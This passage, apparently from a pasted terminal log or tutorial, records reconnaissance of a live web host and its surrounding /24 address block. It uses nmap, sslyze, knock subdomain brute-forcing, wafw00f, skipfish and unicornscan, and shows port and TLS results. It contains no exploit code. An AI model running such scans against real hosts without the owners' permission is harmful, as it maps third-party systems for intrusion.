  628. Service scan Timing: About 86.03% done; ETC: 12:54 (0:06:53 remaining)
  629. Service scan Timing: About 92.02% done; ETC: 12:54 (0:03:56 remaining)
  630. Service scan Timing: About 98.00% done; ETC: 12:54 (0:00:59 remaining)
  631. Completed Service scan at 12:54, 2976.47s elapsed (1002 services on 1 host)
  632. Initiating OS detection (try #1) against 198.71.232.3
  633. Retrying OS detection (try #2) against 198.71.232.3
  634. Initiating Traceroute at 12:54
  635. Completed Traceroute at 12:54, 3.05s elapsed
  636. NSE: Script scanning 198.71.232.3.
  637. Initiating NSE at 12:54
  638. Completed NSE at 12:58, 216.46s elapsed
  639. Initiating NSE at 12:58
  640. Completed NSE at 12:58, 0.24s elapsed
  641. Nmap scan report for 198.71.232.3
  642. Host is up (0.11s latency).
  643. Not shown: 1000 open|filtered ports, 998 filtered ports
  644. PORT STATE SERVICE VERSION
  645. 80/tcp open http Samsung AllShare httpd
  646. | http-methods:
  647. |_ Supported Methods: GET HEAD POST OPTIONS
  648. |_http-server-header: DPS/1.0.3
  649. |_http-title: 404 Not Found
  650. 443/tcp open ssl/http Samsung AllShare httpd
  651. |_http-server-header: DPS/1.0.3
  652. |_http-title: 404 Not Found
  653. | ssl-cert: Subject: commonName=*.godaddysites.com/organizationName=GoDaddy.com, LLC/stateOrProvinceName=Arizona/countryName=US
  654. | Issuer: commonName=Go Daddy Secure Certification Authority/organizationName=GoDaddy.com, Inc./stateOrProvinceName=Arizona/countryName=US
  655. | Public Key type: rsa
  656. | Public Key bits: 2048
  657. | Signature Algorithm: sha1WithRSAEncryption
  658. | Not valid before: 2013-12-09T21:03:50
  659. | Not valid after: 2016-12-09T21:03:50
  660. | MD5: b9fa bb00 6886 5d4c 47be 2cae 6529 fdce
  661. |_SHA-1: 95a5 92da fdd9 dcb8 e554 5599 1d1b 5ae1 7f0f d2c7
  662. |_ssl-date: TLS randomness does not represent time
  663. | tls-nextprotoneg:
  664. | http/1.1
  665. |_ http/1.0
  666. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  667. OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
  668. No OS matches for host
  669. Uptime guess: 0.003 days (since Sun May 29 12:53:57 2016)
  670. Network Distance: 17 hops
  671. TCP Sequence Prediction: Difficulty=261 (Good luck!)
  672. IP ID Sequence Generation: All zeros
  673.  
  674. TRACEROUTE (using port 443/tcp)
  675. HOP RTT ADDRESS
  676. 1 3.37 ms 192.168.1.1
  677. 2 ...
  678. 3 10.25 ms 172.17.19.169
  679. 4 13.05 ms 172.17.18.61
  680. 5 13.14 ms 172.19.240.133
  681. 6 12.84 ms 93.186.128.245
  682. 7 10.91 ms 195.22.205.155
  683. 8 11.54 ms 4.68.111.165
  684. 9 ...
  685. 10 106.27 ms 4.15.136.118
  686. 11 106.89 ms 184.168.6.83
  687. 12 106.79 ms 184.168.6.83
  688. 13 ... 16
  689. 17 108.63 ms 198.71.232.3
  690.  
  691. NSE: Script Post-scanning.
  692. Initiating NSE at 12:58
  693. Completed NSE at 12:58, 0.00s elapsed
  694. Initiating NSE at 12:58
  695. Completed NSE at 12:58, 0.00s elapsed
  696. Read data files from: /usr/bin/../share/nmap
  697. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  698. Nmap done: 1 IP address (1 host up) scanned in 3216.79 seconds
  699. Raw packets sent: 4123 (155.388KB) | Rcvd: 42 (2.672KB)
  700.  
  701.  
  702. USE SSLYZE
  703.  
  704. ┌─[root@parrot]─[~]
  705. └──╼ #sslyze --regular 198.71.232.3:443
  706.  
  707.  
  708. REGISTERING AVAILABLE PLUGINS
  709. -----------------------------
  710.  
  711. PluginSessionRenegotiation
  712. PluginCompression
  713. PluginSessionResumption
  714. PluginCertInfo
  715. PluginOpenSSLCipherSuites
  716.  
  717.  
  718.  
  719. CHECKING HOST(S) AVAILABILITY
  720. -----------------------------
  721.  
  722. 198.71.232.3:443 => 198.71.232.3:443
  723.  
  724.  
  725.  
  726. SCAN RESULTS FOR 198.71.232.3:443 - 198.71.232.3:443
  727. ----------------------------------------------------
  728.  
  729. Unhandled exception when processing --compression:
  730. utils.ctSSL.errors.ctSSLFeatureNotAvailable - Could not enable Zlib compression: OpenSSL was not built with Zlib support ?
  731.  
  732. * Certificate :
  733. Validation w/ Mozilla's CA Store: Certificate is Trusted
  734. Hostname Validation: MISMATCH
  735. SHA1 Fingerprint: 95A592DAFDD9DCB8E55455991D1B5AE17F0FD2C7
  736.  
  737. Common Name: *.godaddysites.com
  738. Issuer: /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, Inc./OU=http://certificates.godaddy.com/repository/CN=Go Daddy Secure Certification Authority/serialNumber=07969287
  739. Serial Number: 4B09760F282ABD
  740. Not Before: Dec 9 21:03:50 2013 GMT
  741. Not After: Dec 9 21:03:50 2016 GMT
  742. Signature Algorithm: sha1WithRSAEncryption
  743. Key Size: 2048
  744. X509v3 Subject Alternative Name: DNS:*.godaddysites.com, DNS:godaddysites.com
  745.  
  746. * Session Renegotiation :
  747. Client-initiated Renegotiations: Honored
  748. Secure Renegotiation: Supported
  749.  
  750. Unhandled exception when processing --sslv2:
  751. utils.ctSSL.errors.ctSSLFeatureNotAvailable - SSLv2 disabled.
  752.  
  753. * Session Resumption :
  754. With Session IDs: Not supported (0 successful, 5 failed, 0 errors, 5 total attempts).
  755. With TLS Session Tickets: Not Supported - TLS ticket assigned but not accepted.
  756.  
  757. * TLSV1_1 Cipher Suites :
  758.  
  759. Rejected Cipher Suite(s): Hidden
  760.  
  761. Preferred Cipher Suite:
  762. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  763.  
  764. Accepted Cipher Suite(s):
  765. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  766. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
  767. AES256-SHA 256 bits HTTP 404 Not Found
  768. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
  769. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
  770. AES128-SHA 128 bits HTTP 404 Not Found
  771. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
  772. DES-CBC3-SHA 112 bits HTTP 404 Not Found
  773.  
  774. Unknown Errors: None
  775.  
  776. * TLSV1_2 Cipher Suites :
  777.  
  778. Rejected Cipher Suite(s): Hidden
  779.  
  780. Preferred Cipher Suite:
  781. ECDHE-RSA-AES256-GCM-SHA384256 bits HTTP 404 Not Found
  782.  
  783. Accepted Cipher Suite(s):
  784. ECDHE-RSA-AES256-SHA384 256 bits HTTP 404 Not Found
  785. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  786. ECDHE-RSA-AES256-GCM-SHA384256 bits HTTP 404 Not Found
  787. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
  788. AES256-SHA256 256 bits HTTP 404 Not Found
  789. AES256-SHA 256 bits HTTP 404 Not Found
  790. AES256-GCM-SHA384 256 bits HTTP 404 Not Found
  791. ECDHE-RSA-AES128-SHA256 128 bits HTTP 404 Not Found
  792. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
  793. ECDHE-RSA-AES128-GCM-SHA256128 bits HTTP 404 Not Found
  794. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
  795. AES128-SHA256 128 bits HTTP 404 Not Found
  796. AES128-SHA 128 bits HTTP 404 Not Found
  797. AES128-GCM-SHA256 128 bits HTTP 404 Not Found
  798. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
  799. DES-CBC3-SHA 112 bits HTTP 404 Not Found
  800.  
  801. Unknown Errors: None
  802.  
  803. * SSLV3 Cipher Suites :
  804.  
  805. Rejected Cipher Suite(s): Hidden
  806.  
  807. Preferred Cipher Suite: None
  808.  
  809. Accepted Cipher Suite(s): None
  810.  
  811. Unknown Errors: None
  812.  
  813. * TLSV1 Cipher Suites :
  814.  
  815. Rejected Cipher Suite(s): Hidden
  816.  
  817. Preferred Cipher Suite:
  818. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  819.  
  820. Accepted Cipher Suite(s):
  821. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
  822. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
  823. AES256-SHA 256 bits HTTP 404 Not Found
  824. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
  825. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
  826. AES128-SHA 128 bits HTTP 404 Not Found
  827. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
  828. DES-CBC3-SHA 112 bits HTTP 404 Not Found
  829.  
  830. Unknown Errors: None
  831.  
  832.  
  833.  
  834. SCAN COMPLETED IN 3.07 S
  835. ------------------------
  836.  
  837. Install knock
  838.  
  839. ┌─[root@parrot]─[~]
  840. └──╼ #wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/knock/knock-1.5.tar.gz
  841. --2016-05-29 12:19:30-- https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/knock/knock-1.5.tar.gz
  842. Resolving storage.googleapis.com (storage.googleapis.com)... 172.217.16.208, 2a00:1450:4001:801::2010
  843. Connecting to storage.googleapis.com (storage.googleapis.com)|172.217.16.208|:443... connected.
  844. HTTP request sent, awaiting response... 200 OK
  845. Length: 8484 (8.3K) [application/octet-stream]
  846. Saving to: ‘knock-1.5.tar.gz’
  847.  
  848. knock-1.5.tar.gz 100%[=====================>] 8.29K --.-KB/s in 0.002s
  849.  
  850. 2016-05-29 12:19:36 (4.03 MB/s) - ‘knock-1.5.tar.gz’ saved [8484/8484]
  851.  
  852. ┌─[root@parrot]─[~]
  853. └──╼ #ls
  854. Desktop Downloads Music Public Videos
  855. Documents knock-1.5.tar.gz Pictures Templates
  856.  
  857. ┌─[root@parrot]─[~]
  858. └──╼ #tar -xvzf knock-1.5.tar.gz
  859. knock.py
  860.  
  861. ┌─[root@parrot]─[~]
  862. └──╼ #cp knock.py Desktop
  863.  
  864. ┌─[root@parrot]─[~]
  865. └──╼ #cd Desktop/
  866.  
  867. ┌─[root@parrot]─[~/Desktop]
  868. └──╼ #chmod +x knock.py
  869.  
  870. USE KNOCK
  871.  
  872. $ python knock.py <option> <url>
  873.  
  874. Rapid Scan
  875.  
  876. Scanning with internal wordlist:
  877. $ python knock.py <url>
  878.  
  879. Scanning with external wordlist:
  880. $ python knock.py <url> <wordlist>
  881.  
  882. Options
  883. -zt Zone Transfer discovery:
  884.  
  885. $ python knock.py -zt <url>
  886. -dns Dns resolver:
  887.  
  888. $ python knock.py -dns <url>
  889. -wc Wildcard testing:
  890.  
  891. $ python knock.py -wc <url>
  892. -wc Wildcard bypass:
  893.  
  894. $ python knock.py -bw <stringexclude> <url>
  895.  
  896. ┌─[root@parrot]─[~/Desktop]
  897. └──╼ #./knock.py vyxunbnbs.com --wordlist /root/Desktop/rockyou.txt
  898. Knock v1.5 by Gianni 'guelfoweb' Amato ( http://knock.googlecode.com )
  899.  
  900. [+] Testing domain
  901. www.vyxunbnbs.com 198.71.232.3
  902. [+] Dns resolving
  903. Domain name Ip address Name server
  904. vyxunbnbs.com 198.71.232.3 ip-198-71-232-3.ip.secureserver.net
  905. Found 1 host(s) for vyxunbnbs.com
  906. [+] Testing wildcard
  907.  
  908. Wildcard enabled! Try with -bw option
  909. Example: knock -bw 404 vyxunbnbs.com
  910.  
  911. ┌─[root@parrot]─[~/Desktop]
  912. └──╼ #./knock.py -bw 404 vyxunbnbs.com
  913. Knock v1.5 by Gianni 'guelfoweb' Amato ( http://knock.googlecode.com )
  914.  
  915. [+] Testing domain
  916. www.vyxunbnbs.com 198.71.232.3
  917. [+] Dns resolving
  918. Domain name Ip address Name server
  919. vyxunbnbs.com 198.71.232.3 ip-198-71-232-3.ip.secureserver.net
  920. Found 1 host(s) for vyxunbnbs.com
  921. [+] Bypass wildcard
  922. 0.vyxunbnbs.com
  923. 01.vyxunbnbs.com
  924. 02.vyxunbnbs.com
  925. 03.vyxunbnbs.com
  926. 1.vyxunbnbs.com
  927.  
  928. --snip--
  929.  
  930. Found 1904 subdomain(s) in 523.4 second(s)
  931.  
  932.  
  933. CHECK IF THE SITE IS BEHIND A FIREWALL
  934.  
  935. ┌─[root@parrot]─[~]
  936. └──╼ #wafw00f 198.71.232.3
  937.  
  938. ^ ^
  939. _ __ _ ____ _ __ _ _ ____
  940. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  941. | V V // o // _/ | V V // 0 // 0 // _/
  942. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  943. <
  944. ...'
  945.  
  946. WAFW00F - Web Application Firewall Detection Tool
  947.  
  948. By Sandro Gauci && Wendel G. Henrique
  949.  
  950. Checking http://198.71.232.3
  951. The site http://198.71.232.3 is behind a SecureIIS
  952. Number of requests: 9
  953.  
  954.  
  955. CHECK THE SITE WITH SKIPFISH
  956.  
  957. ┌─[root@parrot]─[~]
  958. └──╼ #skipfish -o /tmp/snep http://www.vyxunbnbs.com
  959.  
  960.  
  961. skipfish version 2.10b by lcamtuf@google.com 345 kB out (199.0 kB/s) l
  962. skipfish version 2.10b by lcamtuf@google.com 352 kB out (201.2 kB/s) l
  963. skipfish version 2.10b by lcamtuf@google.com 358 kB out (206.1 kB/s) l
  964. skipfish version 2.10b by lcamtuf@google.com 369 kB out (214.7 kB/s) l
  965. - www.vyxunbnbs.com -30.831s), 6349 kB in, 378 kB out (221.3 kB/s) l
  966. - www.vyxunbnbs.com -31.125s), 6612 kB in, 386 kB out (227.0 kB/s) l
  967. Scan statistics:: 0:00:31.635s), 6796 kB in, 391 kB out (230.9 kB/s) l
  968. Scan statistics:: 0:00:31.920s), 7064 kB in, 398 kB out (235.9 kB/s) l
  969. Scan time : 0:00:32.170s), 7236 kB in, 403 kB out (239.4 kB/s) l
  970. Scan time : 0:00:32.334s), 7389 kB in, 407 kB out (242.4 kB/s) l
  971. HTTP requests : 1728 (53.4/s), 7460 kB in, 408 kB out (243.3 kB/s) l
  972. Compression : 5611 kB in, 26863 kB out (65.4% gain) 0 drops0 val
  973. HTTP faults : 1 net errors, 0 proto errors, 1 retried, 0 drops0 val
  974. TCP handshakes : 19 total (90.9 req/conn) purgeddict 1 par, 0 val
  975. TCP faults : 0 failures, 0 timeouts, 8 purgeddict 1 par, 0 val
  976. External links : 5456 skipped done (91.30%) 0 dict 1 par, 0 val
  977. Reqs pending : 0 21 done (91.30%) 0 dict 1 par, 0 val
  978. Database statistics: total, 21 done (91.30%) 0 dict 1 par, 0 val
  979. Database statistics: total, 21 done (91.30%) 0 dict 1 par, 0 val
  980. Pivots : 23 total, 21 done (91.30%) 0 dict 1 par, 0 val
  981. Pivots : 23 total, 22 done (95.65%) 0 dict 1 par, 0 val
  982. In progress : 0 pending, 0 init, 1 attacks, 0 dict 1 par, 0 val
  983. Missing nodes : 0 spotted dir, 20 file, 0 pinfo, 0 unkn, 1 par, 0 val
  984. Node types : 1 serv, 1 dir, 20 file, 0 pinfo, 0 unkn, 1 par, 0 val
  985. Issues found : 6 info, 1 warn, 102 low, 39 medium, 0 high impact
  986. Dict size : 17 words (17 new), 2 extensions, 256 candidates
  987. Signatures : 77 total
  988.  
  989. [+] Copying static resources...
  990. [+] Sorting and annotating crawl nodes: 23
  991. [+] Looking for duplicate entries: 23
  992. [+] Counting unique nodes: 14
  993. [+] Saving pivot data for third-party tools...
  994. [+] Writing scan description...
  995. [+] Writing crawl tree: 23
  996. [+] Generating summary views...
  997. [+] Report saved to '/tmp/snep/index.html' [0xed916f54].
  998. [+] This was a great day for science!
  999.  
  1000. ┌─[root@parrot]─[~]
  1001. └──╼ #firefox /tmp/snep/index.html
  1002.  
  1003. CHECK THE SITE WITH UNICORNSCAN
  1004.  
  1005. ┌─[root@parrot]─[~]
  1006. └──╼ #unicornscan -r200 -Iv -eosdetect -mT 198.71.232.3:3306,80,443
  1007.  
  1008. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
  1009. using interface(s) eth0
  1010. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
  1011. sender statistics 199.2 pps with 3 packets sent total
  1012. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1013. TCP open 198.71.232.3:80 ttl 47
  1014. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1015. TCP open 198.71.232.3:443 ttl 47
  1016. listener statistics 72 packets recieved 0 packets droped and 0 interface drops
  1017. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1018. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1019.  
  1020. UDP Scan
  1021.  
  1022. ┌─[root@parrot]─[~]
  1023. └──╼ #unicornscan -mU -r200 -I 198.71.232.3
  1024.  
  1025.  
  1026. Where
  1027.  
  1028. __________________________________________________________________
  1029. -mU : is mode UDP
  1030. -I : Display Immediately
  1031. 198.71.232.3 : target IP
  1032. :53 : port number
  1033. -r200 : 200 Packets per second
  1034. ___________________________________________________________________
  1035.  
  1036. TCP Scan
  1037.  
  1038. ┌─[✗]─[root@parrot]─[~]
  1039. └──╼ #unicornscan -r500 -mT 198.71.232.1/24:80,443,445,339
  1040.  
  1041.  
  1042. Where
  1043.  
  1044. __________________________________________________________________
  1045. -mT : is mode TCP
  1046. 198.71.232.3/24 : target network range ( block )
  1047. :80,443,445,339 : ports
  1048. -r500 : 500 Packets per second
  1049. ___________________________________________________________________
  1050.  
  1051. Many Other options you can pass , for example for ACK use -mTsA
  1052.  
  1053. SYN : -mT
  1054. ACK scan : -mTsA
  1055. Fin scan : -mTsF
  1056. Null scan : -mTs
  1057. Xmas scan : -mTsFPU
  1058. Connect Scan : -msf -Iv
  1059. scan with all options : -mTFSRPAUEC
  1060. Syn + osdetect : -eosdetect -Iv (-mT)
  1061. scan ports 1 through 5 : (-mT) host:1-5
  1062.  
  1063. Practical Use Case
  1064.  
  1065. scanning for mysql with http and https ports
  1066.  
  1067. ┌─[root@parrot]─[~]
  1068. └──╼ #unicornscan -r200 -Iv -eosdetect -mT vyxunbnbs.com:3306,80,443
  1069. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
  1070. using interface(s) eth0
  1071. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
  1072. sender statistics 194.9 pps with 3 packets sent total
  1073. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1074. TCP open 198.71.232.3:80 ttl 47
  1075. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1076. TCP open 198.71.232.3:443 ttl 47
  1077. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1078. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 4372 and we have 1550
  1079. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 9414 and we have 1550
  1080. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1081. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1082. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 3254 and we have 1550
  1083. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1084. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 4372 and we have 1550
  1085. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1086. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 4094 and we have 1550
  1087. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1088. listener statistics 193 packets recieved 0 packets droped and 0 interface drops
  1089. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1090. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1091.  
  1092. ┌─[root@parrot]─[~]
  1093. └──╼ #unicornscan -eosdetect -Iv -v vyxunbnbs.com
  1094. adding 198.71.232.3/32 mode `TCPscan' ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
  1095. using interface(s) eth0
  1096. added module payload for port 1900 proto 17
  1097. added module payload for port 80 proto 6
  1098. added module payload for port 5060 proto 17
  1099. added module payload for port 53 proto 17
  1100. added module payload for port 80 proto 6
  1101. added module payload for port 518 proto 17
  1102. scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a little longer than 8 Seconds
  1103. drone type Unknown on fd 4 is version 1.1
  1104. drone type Unknown on fd 5 is version 1.1
  1105. added module payload for port 1900 proto 17
  1106. added module payload for port 80 proto 6
  1107. added module payload for port 5060 proto 17
  1108. added module payload for port 53 proto 17
  1109. added module payload for port 80 proto 6
  1110. added module payload for port 518 proto 17
  1111. scan iteration 1 out of 1
  1112. using pcap filter: `dst 192.168.1.83 and ! src 192.168.1.83 and (tcp)'
  1113. using TSC delay
  1114. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1115. TCP open 198.71.232.3:80 ttl 47
  1116. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1117. TCP open 198.71.232.3:443 ttl 47
  1118. sender statistics 290.1 pps with 338 packets sent total
  1119. listener statistics 166 packets recieved 0 packets droped and 0 interface drops
  1120. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1121. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1122.  
  1123.  
  1124. ┌─[root@parrot]─[~]
  1125. └──╼ #unicornscan -r200 -Iv -eosdetect -mT vyxunbnbs.com:3306,80,443
  1126. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
  1127. using interface(s) eth0
  1128. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
  1129. sender statistics 138.1 pps with 3 packets sent total
  1130. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1131. TCP open 198.71.232.3:80 ttl 47
  1132. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1133. TCP open 198.71.232.3:443 ttl 47
  1134. listener statistics 142 packets recieved 0 packets droped and 0 interface drops
  1135. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1136. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1137.  
  1138. ┌─[root@parrot]─[~]
  1139. └──╼ #unicornscan -r200 -Iv -eosdetect -mT 198.71.232.3:3306,80,443
  1140. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
  1141. using interface(s) eth0
  1142. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
  1143. sender statistics 199.3 pps with 3 packets sent total
  1144. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1145. TCP open 198.71.232.3:80 ttl 47
  1146. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
  1147. TCP open 198.71.232.3:443 ttl 47
  1148. listener statistics 146 packets recieved 0 packets droped and 0 interface drops
  1149. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
  1150. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
  1151.  
  1152.  
  1153. ┌─[root@parrot]─[~]
  1154. └──╼ #unicornscan -msf -v -I 198.71.232.3/24
  1155. adding 198.71.232.0/24 mode `TCPscan' ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
  1156. using interface(s) eth0
  1157. scaning 2.56e+02 total hosts with 8.65e+04 total packets, should take a little longer than 4 Minutes, 55 Seconds
  1158. connected 192.168.1.83:39367 -> 198.71.232.3:443
  1159. TCP open 198.71.232.3:443 ttl 47
  1160. connected 192.168.1.83:31012 -> 198.71.232.5:443
  1161. TCP open 198.71.232.5:443 ttl 110
  1162. connected 192.168.1.83:7126 -> 198.71.232.4:443
  1163. TCP open 198.71.232.4:443 ttl 47
  1164. connected 192.168.1.83:32420 -> 198.71.232.7:443
  1165. TCP open 198.71.232.7:443 ttl 47
  1166. connected 192.168.1.83:6417 -> 198.71.232.6:443
  1167. TCP open 198.71.232.6:443 ttl 47
  1168. connected 192.168.1.83:64190 -> 198.71.232.4:80
  1169. TCP open 198.71.232.4:80 ttl 47
  1170. connected 192.168.1.83:36816 -> 198.71.232.6:80
  1171. TCP open 198.71.232.6:80 ttl 47
  1172. connected 192.168.1.83:56533 -> 198.71.232.7:80
  1173. TCP open 198.71.232.7:80 ttl 47
  1174. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1175. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 1722 and we have 1550
  1176. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1177. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1178. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
  1179. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 5435 and we have 1550
  1180. connected 192.168.1.83:5563 -> 198.71.232.7:22
  1181. TCP open 198.71.232.7:22 ttl 47
  1182. connected 192.168.1.83:7734 -> 198.71.232.1:25
  1183. TCP open 198.71.232.1:25 ttl 47
  1184. connected 192.168.1.83:43683 -> 198.71.232.0:25
  1185. TCP open 198.71.232.0:25 ttl 47
  1186. connected 192.168.1.83:30502 -> 198.71.232.2:25
  1187. TCP open 198.71.232.2:25 ttl 47
  1188. sender statistics 290.9 pps with 86528 packets sent total
  1189. listener statistics 180 packets recieved 0 packets droped and 0 interface drops
  1190. TCP open smtp[ 25] from 198.71.232.0 ttl 47
  1191. TCP open smtp[ 25] from 198.71.232.1 ttl 47
  1192. TCP open smtp[ 25] from 198.71.232.2 ttl 47
  1193. TCP open https[ 443] from 198.71.232.3 ttl 47
  1194. TCP open http[ 80] from 198.71.232.4 ttl 47
  1195. TCP open https[ 443] from 198.71.232.4 ttl 47
  1196. TCP open https[ 443] from 198.71.232.5 ttl 110
  1197. TCP open http[ 80] from 198.71.232.6 ttl 47
  1198. TCP open https[ 443] from 198.71.232.6 ttl 47
  1199. TCP open ssh[ 22] from 198.71.232.7 ttl 47
  1200. TCP open http[ 80] from 198.71.232.7 ttl 47
  1201. TCP open https[ 443] from 198.71.232.7 ttl 47
  1202.  
  1203.  
  1204. ┌─[✗]─[root@parrot]─[~]
  1205. └──╼ #unicornscan -mU -v -I 198.71.232.3/24
